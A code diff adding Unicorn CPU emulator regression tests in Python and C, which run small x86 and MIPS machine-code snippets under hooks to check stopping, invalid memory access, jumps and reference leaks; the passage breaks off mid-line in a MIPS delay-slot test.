b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_stop_emu.py new file mode 100644 index 0000000..33f2f8f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_stop_emu.py @@ -0,0 +1,91 @@ +#!/usr/bin/python + +from __future__ import print_function +import binascii +import regress + +from unicorn import * +from unicorn.x86_const import * + + +CODE = binascii.unhexlify(b"".join([ + b"48c7c003000000", # mov rax, 3 mapped: 0x1000 + b"0f05", # syscall mapped: 0x1007 + b"48c7c700400000", # mov rdi, 0x4000 mapped: 0x1009 + b"488907", # mov [rdi], rdx mapped: 0x1010 + b"488b07", # mov rdx, [rdi] mapped: 0x1013 + b"4883c201", # add rdx, 1 mapped: 0x1016 + ])) + + +class SingleStepper: + def __init__(self, emu, test): + self._emu = emu + self._hit_count = 0 + self._test = test + + def _stop_hook(self, uc, address, *args, **kwargs): + if self._hit_count == 0: + self._hit_count += 1 + else: + self._test.assertEqual(1, self._hit_count, "HOOK_CODE invoked too many times") + uc.emu_stop() + + def step(self): + self._hit_count = 0 + h = self._emu.hook_add(UC_HOOK_CODE, self._stop_hook) + try: + pc = self._emu.reg_read(UC_X86_REG_RIP) + self._emu.emu_start(pc, pc+0x20) + finally: + self._emu.hook_del(h) + + +def showpc(mu): + pc = mu.reg_read(UC_X86_REG_RIP) + print("pc: 0x%x" % (pc)) + + +class HookCodeStopEmuTest(regress.RegressTest): + def test_hook_code_stop_emu(self): + try: + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + + # scratch, used by CODE + mu.mem_map(0x4000, 0x1000) + + mu.reg_write(UC_X86_REG_RDX, 0x1) + mu.reg_write(UC_X86_REG_RIP, 0x1000) + + # 0x1000: 48c7c003000000 mov rax, 3 + # 0x1007: 0f05 syscall + # 0x1009: 48c7c700400000 mov rdi, 0x4000 + # 0x1010: 488907 mov [rdi], rdx + # 0x1013: 488b07 mov rdx, [rdi] + # 0x1016: 4883c201 add rdx, 1 + + stepper = SingleStepper(mu, self) + showpc(mu) + self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_RIP), "Unexpected PC") + + + stepper.step() + showpc(mu) + self.assertEqual(0x1007, mu.reg_read(UC_X86_REG_RIP), + "Emulator failed to stop after one instruction") + + stepper.step() + showpc(mu) + self.assertEqual(0x1009, mu.reg_read(UC_X86_REG_RIP), + "Emulator failed to stop after one instruction") + + except UcError as e: + self.assertFalse(0, "ERROR: %s" % e) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_extrainvoke.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_extrainvoke.c new file mode 100644 index 0000000..8fd486f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_extrainvoke.c @@ -0,0 +1,93 @@ +#include +#include + +#include + +#define X86_CODE32 "\xf3\xab" // rep stosd dword ptr es:[edi], eax -> Fill (E)CX doublewords at ES:[(E)DI] with EAX +#define ADDRESS 0x1000000 +#define ECX_OPS 2 +static long unsigned int hook_called = 0; + +void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + hook_called++; + printf("hook called\n"); +} + +static void VM_exec() +{ + uc_engine *uc; + uc_err err; + uc_hook trace; + unsigned int r_eax, eflags, r_esp, r_edi, r_ecx; + + r_eax = 0xbaadbabe; + r_esp = ADDRESS+0x20; + r_edi = ADDRESS+0x300; //some safe distance from main code. + eflags = 0x00000206; + r_ecx = ECX_OPS; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s\n", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook. + uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_hook_add(uc, &trace, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_read(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_close(uc); + + printf("\n>>> Emulation done. Below is the CPU context\n"); + printf(">>> EAX = 0x%08X\n", r_eax); + printf(">>> ECX = 0x%08X\n", r_ecx); + printf(">>> EDI = 0x%08X\n", r_edi); + printf(">>> EFLAGS = 0x%08X\n", eflags); + + printf("\nHook called %lu times. Test %s\n", hook_called, (hook_called == ECX_OPS ? "PASSED!!" : "FAILED!!!")); + +} + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_readonly_write_local.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_readonly_write_local.py new file mode 100644 index 0000000..76b1589 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_readonly_write_local.py @@ -0,0 +1,30 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * +import regress + +PAGE_SIZE = 4 * 1024 +ACCESS_ADDR = 0x1000 + +# mov eax, [0x1000] +# mov eax, [0x1000] +CODE = b'\xA1\x00\x10\x00\x00\xA1\x00\x10\x00\x00' + +def hook_mem_read(uc, access, address, size, value, data): + print("Reading at " + str(address)) + uc.mem_write(address, CODE); + +class REP(regress.RegressTest): + + def test_rep(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + mu.mem_map(0, PAGE_SIZE) + mu.mem_write(0, CODE) + mu.mem_map(ACCESS_ADDR, PAGE_SIZE, UC_PROT_READ); + mu.hook_add(UC_HOOK_MEM_READ, hook_mem_read, begin = ACCESS_ADDR, end = ACCESS_ADDR + PAGE_SIZE) + + mu.emu_start(0, len(CODE)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/init.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/init.py new file mode 100644 index 0000000..024ea39 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/init.py @@ -0,0 +1,68 @@ +#!/usr/bin/python +# By Mariano Graziano + +from unicorn import * +from unicorn.x86_const import * + +import regress, struct + +mu = 0 + +class Init(regress.RegressTest): + + def init_unicorn(self, ip, sp, counter): + global mu + #print "[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter) + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0x1000000, 2 * 1024 * 1024) + mu.mem_write(0x1000000, "\x90") + mu.mem_map(0x8000000, 8 * 1024 * 1024) + mu.reg_write(UC_X86_REG_RSP, sp) + content = self.generate_value(counter) + mu.mem_write(sp, content) + self.set_hooks() + + def generate_value(self, counter): + start = 0xffff880026f02000 + offset = counter * 8 + address = start + offset + return struct.pack(">> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" %(address, size, value) + address_page = address & 0xFFFFFFFFFFFFF000 + mu.mem_map(address_page, 2 * 1024 * 1024) + mu.mem_write(address, str(value)) + return True + else: + return False + + def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): + global mu + print "[ HOOK_MEM_FETCH - Address: %s ]" % hex(address).strip("L") + print "[ mem_fetch_unmapped: faulting address at %s ]" % hex(address).strip("L") + mu.mem_write(0x1000003, "\x90") + mu.reg_write(UC_X86_REG_RIP, 0x1000001) + return True + + def runTest(self): + global mu + ips = list(xrange(0x1000000, 0x1001000, 0x1)) + sps = list(xrange(0x8000000, 0x8001000, 0x1)) + j = 0 + for i in ips: + j += 1 + index = ips.index(i) + self.init_unicorn(i, sps[index], j) + mu.emu_start(0x1000000, 0x1000000 + 0x1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_cpu_tb_exec.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_cpu_tb_exec.c new file mode 100644 index 0000000..01e8a98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_cpu_tb_exec.c @@ -0,0 +1,33 @@ +#include + +static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_block(%p, %"PRIx64", %d, %p)\n", uc, address, size, user_data); +} + +/* + * Disassembly according to capstone: + * add byte ptr [rip - 1], 0x30 + * jmp 0x1000000 + */ +#define BINARY "\x80\x05\xff\xff\xff\xff\x30\xeb\xf7\x30" +#define MEMORY_SIZE 2 * 1024 * 1024 +#define STARTING_ADDRESS 0x1000000 + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); + if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook hook; + uc_hook_add(uc, &hook, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_tb_flush_x86_64.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_tb_flush_x86_64.c new file mode 100644 index 0000000..dc2ca49 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_read_in_tb_flush_x86_64.c @@ -0,0 +1,27 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_X86 +#define HARDWARE_MODE UC_MODE_64 + +#define MEMORY_STARTING_ADDRESS 0x1000000 +#define MEMORY_SIZE 2 * 1024 * 1024 +#define MEMORY_PERMISSIONS UC_PROT_READ + +#define BINARY_CODE "\x90" + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write.py new file mode 100644 index 0000000..b37305f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python +# Test callback that returns False to cancel emulation + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +import regress + +X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx + + +# callback for tracing invalid memory access (READ or WRITE) +def hook_mem_invalid(uc, access, address, size, value, user_data): + return False + + +class InvalidWrite(regress.RegressTest): + def test(self): + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # memory address where emulation starts + ADDRESS = 0x1000000 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # intercept invalid memory events + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) + + try: + # emulation should return with error UC_ERR_WRITE_UNMAPPED + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE)) + except UcError as e: + self.assertEqual(e.errno, UC_ERR_WRITE_UNMAPPED) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c new file mode 100644 index 0000000..47c19f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/invalid_write_in_cpu_tb_exec_x86_64.c @@ -0,0 +1,26 @@ +#include + +/* + * Disassembly according to capstone: + * mulx rsp, rsp, rdx + */ +#define BINARY "\xc4\xe2\xdb\xf6\xe2" +#define MEMORY_SIZE 2 * 1024 * 1024 +#define STARTING_ADDRESS 0x1000000 + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); + if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/jmp_ebx_hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jmp_ebx_hang.py new file mode 100644 index 0000000..5b3952c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jmp_ebx_hang.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +"""See https://github.com/unicorn-engine/unicorn/issues/82""" + +import unicorn +from unicorn import * +import regress + +CODE_ADDR = 0x10101000 +CODE = b'\xff\xe3' # jmp ebx + +class JumEbxHang(regress.RegressTest): + + def runTest(self): + mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(CODE_ADDR, 1024 * 4) + mu.mem_write(CODE_ADDR, CODE) + # If EBX is zero then an exception is raised, as expected + mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0x0) + + print(">>> jmp ebx (ebx = 0)"); + with self.assertRaises(UcError) as m: + mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1) + + self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED) + + print(">>> jmp ebx (ebx = 0xaa96a47f)"); + mu = unicorn.Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(CODE_ADDR, 1024 * 4) + # If we write this address to EBX then the emulator hangs on emu_start + mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, 0xaa96a47f) + mu.mem_write(CODE_ADDR, CODE) + with self.assertRaises(UcError) as m: + mu.emu_start(CODE_ADDR, CODE_ADDR + 2, count=1) + + self.assertEqual(m.exception.errno, UC_ERR_FETCH_UNMAPPED) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/jumping.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jumping.py new file mode 100644 index 0000000..265ec07 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/jumping.py @@ -0,0 +1,167 @@ +#!/usr/bin/env python +# Mariano Graziano + +from unicorn import * +from unicorn.x86_const import * + +import regress + +#echo -ne "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" | ndisasm - -b64 +#00000000 4831C0 xor rax,rax +#00000003 48B8040000000000 mov rax,0x4 +# -0000 +#0000000D 483D05000000 cmp rax,0x5 +#00000013 7405 jz 0x1a +#00000015 E90F000000 jmp qword 0x29 +#0000001A 48BABEBA00000000 mov rdx,0xbabe +# -0000 +#00000024 E90F000000 jmp qword 0x38 +#00000029 48BACAC000000000 mov rdx,0xc0ca +# -0000 +#00000033 E900000000 jmp qword 0x38 +#00000038 90 nop + + +mu = 0 +zf = 1 # (0:clear, 1:set) + + +class Init(regress.RegressTest): + def clear_zf(self): + eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS) + eflags = eflags_cur & ~(1 << 6) + #eflags = 0x0 + print "[clear_zf] - eflags from %x to %x" % (eflags_cur, eflags) + if eflags != eflags_cur: + print "[clear_zf] - writing new eflags..." + mu.reg_write(UC_X86_REG_EFLAGS, eflags) + + def set_zf(self): + eflags_cur = mu.reg_read(UC_X86_REG_EFLAGS) + eflags = eflags_cur | (1 << 6) + #eflags = 0xFFFFFFFF + print "[set_zf] - eflags from %x to %x" % (eflags_cur, eflags) + if eflags != eflags_cur: + print "[set_zf] - writing new eflags..." + mu.reg_write(UC_X86_REG_EFLAGS, eflags) + + def handle_zf(self, zf): + print "[handle_zf] - eflags " , zf + if zf == 0: self.clear_zf() + else: self.set_zf() + + def multipath(self): + print "[multipath] - handling ZF (%s) - default" % zf + self.handle_zf(zf) + + # callback for tracing basic blocks + def hook_block(self, uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + # callback for tracing instructions + def hook_code(self, uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + rax = mu.reg_read(UC_X86_REG_RAX) + rbx = mu.reg_read(UC_X86_REG_RBX) + rcx = mu.reg_read(UC_X86_REG_RCX) + rdx = mu.reg_read(UC_X86_REG_RDX) + rsi = mu.reg_read(UC_X86_REG_RSI) + rdi = mu.reg_read(UC_X86_REG_RDI) + r8 = mu.reg_read(UC_X86_REG_R8) + r9 = mu.reg_read(UC_X86_REG_R9) + r10 = mu.reg_read(UC_X86_REG_R10) + r11 = mu.reg_read(UC_X86_REG_R11) + r12 = mu.reg_read(UC_X86_REG_R12) + r13 = mu.reg_read(UC_X86_REG_R13) + r14 = mu.reg_read(UC_X86_REG_R14) + r15 = mu.reg_read(UC_X86_REG_R15) + eflags = mu.reg_read(UC_X86_REG_EFLAGS) + + print(">>> RAX = %x" %rax) + print(">>> RBX = %x" %rbx) + print(">>> RCX = %x" %rcx) + print(">>> RDX = %x" %rdx) + print(">>> RSI = %x" %rsi) + print(">>> RDI = %x" %rdi) + print(">>> R8 = %x" %r8) + print(">>> R9 = %x" %r9) + print(">>> R10 = %x" %r10) + print(">>> R11 = %x" %r11) + print(">>> R12 = %x" %r12) + print(">>> R13 = %x" %r13) + print(">>> R14 = %x" %r14) + print(">>> R15 = %x" %r15) + print(">>> ELAGS = %x" %eflags) + print "-"*11 + self.multipath() + print "-"*11 + + # callback for tracing memory access (READ or WRITE) + def hook_mem_access(self, uc, access, address, size, value, user_data): + if access == UC_MEM_WRITE: + print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ + %(address, size, value)) + else: # READ + print(">>> Memory is being READ at 0x%x, data size = %u" \ + %(address, size)) + + # callback for tracing invalid memory access (READ or WRITE) + def hook_mem_invalid(self, uc, access, address, size, value, user_data): + print("[ HOOK_MEM_INVALID - Address: %s ]" % hex(address)) + if access == UC_MEM_WRITE_UNMAPPED: + print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" %(address, size, value)) + return True + else: + print(">>> Missing memory is being READ at 0x%x, data size = %u, data value = 0x%x" %(address, size, value)) + return True + + + def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): + print("[ HOOK_MEM_FETCH - Address: %s ]" % hex(address)) + print("[ mem_fetch_unmapped: faulting address at %s ]" % hex(address).strip("L")) + return True + + def runTest(self): + global mu + + JUMP = "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" + + ADDRESS = 0x1000000 + + print("Emulate x86_64 code") + # Initialize emulator in X86-64bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, JUMP) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, self.hook_block) + + # tracing all instructions in range [ADDRESS, ADDRESS+0x60] + mu.hook_add(UC_HOOK_CODE, self.hook_code, None, ADDRESS, ADDRESS+0x60) + + # tracing all memory READ & WRITE access + mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) + mu.hook_add(UC_HOOK_MEM_READ, self.hook_mem_access) + mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(JUMP)) + except UcError as e: + print("ERROR: %s" % e) + + rdx = mu.reg_read(UC_X86_REG_RDX) + self.assertEqual(rdx, 0xbabe, "RDX contains the wrong value. Eflags modification failed.") + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/leaked_refs.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/leaked_refs.py new file mode 100644 index 0000000..263345d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/leaked_refs.py @@ -0,0 +1,63 @@ +#!/usr/bin/python + +from __future__ import print_function + +import time + +from unicorn import * +from unicorn.x86_const import * + +import objgraph + +import regress + +ADDRESS = 0x8048000 +STACK_ADDRESS = 0xffff000 +STACK_SIZE = 4096 +''' +31 DB xor ebx, ebx +53 push ebx +43 inc ebx +53 push ebx +6A 02 push 2 +6A 66 push 66h +58 pop eax +89 E1 mov ecx, esp +CD 80 int 80h +''' +CODE = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" +EP = ADDRESS + 0x54 + +def hook_code(mu, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + +def emu_loop(): + emu = Uc(UC_ARCH_X86, UC_MODE_32) + emu.mem_map(ADDRESS, 0x1000) + emu.mem_write(EP, CODE) + + emu.mem_map(STACK_ADDRESS, STACK_SIZE) + emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE) + + i = emu.hook_add(UC_HOOK_CODE, hook_code, None) + emu.hook_del(i) + + emu.emu_start(EP, EP + len(CODE), count = 3) + print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP)) + +def debugMem(): + import gc + gc.collect() # don't care about stuff that would be garbage collected properly + #print("Orphaned objects in gc.garbage:", gc.garbage) + assert(len(objgraph.by_type("Uc")) == 0) + #assert(len(objgraph.get_leaking_objects()) == 0) + +class EmuLoopReferenceTest(regress.RegressTest): + def runTest(self): + for i in range(5): + emu_loop() + debugMem() + + +if __name__ == '__main__': + regress.main() \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_crash.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_crash.c new file mode 100644 index 0000000..1d89d8d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_crash.c @@ -0,0 +1,32 @@ +#include +#include +#include +#include + +#define UC_BUG_WRITE_SIZE 13000 +#define UC_BUG_WRITE_ADDR 0x1000 + +int main() +{ + int size; + uint8_t *buf; + uc_engine *uc; + uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + fprintf (stderr, "Cannot initialize unicorn\n"); + return 1; + } + size = UC_BUG_WRITE_SIZE; + buf = malloc (size); + if (!buf) { + fprintf (stderr, "Cannot allocate\n"); + return 1; + } + memset (buf, 0, size); + if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { + uc_mem_write (uc, UC_BUG_WRITE_ADDR, buf, size); + } + uc_close(uc); + free(buf); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_write.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_write.c new file mode 100644 index 0000000..124e2d8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_write.c @@ -0,0 +1,54 @@ +#include +#include +#include + +#define ADDR 0x00400000 +#define SIZE 1024*64 +#define OVERFLOW 1 + +int main() +{ + uc_engine *uc = NULL; + uint8_t *buf = NULL, *buf2 = NULL; + int i; + uc_err err; + + err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + printf ("uc_open %d\n", err); + goto exit; + } + err = uc_mem_map (uc, ADDR, SIZE, UC_PROT_ALL); + if (err) { + printf ("uc_mem_map %d\n", err); + goto exit; + } + buf = calloc (SIZE*2, 1); + buf2 = calloc (SIZE, 1); + for (i=0;i +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#include "pthread.h" +#endif // _MSC_VER + +// common includes +#include + + +const uint64_t addr = 0x100000; +// This code SHOULD execute the instruction at 0x100010. +const unsigned char test_code_1[] = { + 0x00,0x00,0x04,0x24, // 100000: li $a0, 0 + 0x01,0x00,0x02,0x24, // 100004: li $v0, 1 + 0x02,0x00,0x03,0x24, // 100008: li $v1, 2 + 0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014 + 0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0 +}; +// This code SHOULD NOT execute the instruction at 0x100010. +const unsigned char test_code_2[] = { + 0x00,0x00,0x04,0x24, // 100000: li $a0, 0 + 0x01,0x00,0x02,0x24, // 100004: li $v0, 1 + 0x01,0x00,0x03,0x24, // 100008: li $v1, 1 + 0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014 + 0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0 +}; +int test_num = 0; +// flag for whether the delay slot was executed by the emulator +bool test1_delayslot_executed = false; +bool test2_delayslot_executed = false; +// flag for whether the delay slot had a code hook called for it +bool test1_delayslot_hooked = false; +bool test2_delayslot_hooked = false; + + +// This hook is used to show that code is executing in the emulator. +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf("Test %d Executing: %"PRIx64"\n", test_num, address); + if( test_num == 1 && address == 0x100010 ) + { + printf("Delay slot hook called!\n"); + test1_delayslot_hooked = true; + } + if( test_num == 2 && address == 0x100010 ) + { + printf("Delay slot hook called!\n"); + test2_delayslot_hooked = true; + } +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook hhc; + uint32_t val; + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + printf("uc_open()\n"); + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + printf("uc_mem_map()\n"); + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + printf("uc_hook_add()\n"); + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + + // write test1 code to be emulated to memory + test_num = 1; + printf("\nuc_mem_write(1)\n"); + err = uc_mem_write(uc, addr, test_code_1, sizeof(test_code_1)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + // start executing test code 1 + printf("uc_emu_start(1)\n"); + uc_emu_start(uc, addr, addr+sizeof(test_code_1), 0, 0); + // read the value from a0 when finished executing + uc_reg_read(uc, 